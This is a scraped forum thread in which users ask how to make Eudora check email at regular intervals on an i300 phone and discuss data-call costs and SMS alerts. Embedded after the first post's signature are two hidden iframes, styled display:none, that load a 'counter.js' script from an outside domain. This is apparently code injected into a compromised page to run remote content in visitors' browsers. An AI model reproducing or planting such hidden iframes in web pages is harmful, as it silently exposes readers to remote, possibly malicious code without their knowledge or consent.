+ Reply to Thread

Interval Checking with Eudora

I use Eudora for my email and it's generally worked out. Does anyone know if there is a way to get it to check email at some sort of regular intervals?

It would be great (almost Blackberry-like convenience) if Eudora would automatically run a "check for new mail" every 1/2 hour or so. If Eudora can't do this (and I haven't found a way yet) then are there any other programs (like Multimail, etc.) that operate this way?

--Nick<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i300 User
    Don't know how to do it with Eudora.

This program looks like more of what you are looking for, though:

http://www.appliedreasoning.com/CB_Mobile_Mail_home.htm

gf

Administrator

Arrow

this would involve making a data call each time to do this, and i dont know of a good program that will do that successfully on the i300... and these would add up over the course of the month.. especialy if you have a lot of emails at any given time to download..

If you find a program that will do this, please post the results of your trial. I'd like something like that also.
    Carl

Regarding the number of minutes, it shouldn't be that bad. I figure that if you check every 1/2 hour and it takes 2 minutes per check that would be about an hour per day. Ideally, you'd be able to disable checking at night.

This shouldn't be a problem if you have 10,000 minutes per month

CB Mobile Mail seems to be able to notify the phone without using minutes. Probably some sort of SMS. They don't give a whole lot of detail though.

Administrator

Arrow

Originally posted by Kroywen
    Regarding the number of minutes, it shouldn't be that bad. I figure that if you check every 1/2 hour and it takes 2 minutes per check that would be about an hour per day. Ideally, you'd be able to disable checking at night.

This shouldn't be a problem if you have 10,000 minutes per month

CB Mobile Mail seems to be able to notify the phone without using minutes. Probably some sort of SMS. They don't give a whole lot of detail though.
    that could be an average value, but silly things can happen in the interim, like dropped calls and retries, also that one long a$$ email(s)...
    and re: mobile mail (are you talking about gopherking?) , if it uses sms messages, that will count towards your 50/month..if you go over, then your gonna be charged..

just the facts ma'am (sir).. i dont want anyone to not see the god and bad... :o

as previously mentioned, the best way is to use SMS...

you could have the mail system send a SMS to your phone when you have new email in your account.....

Brooks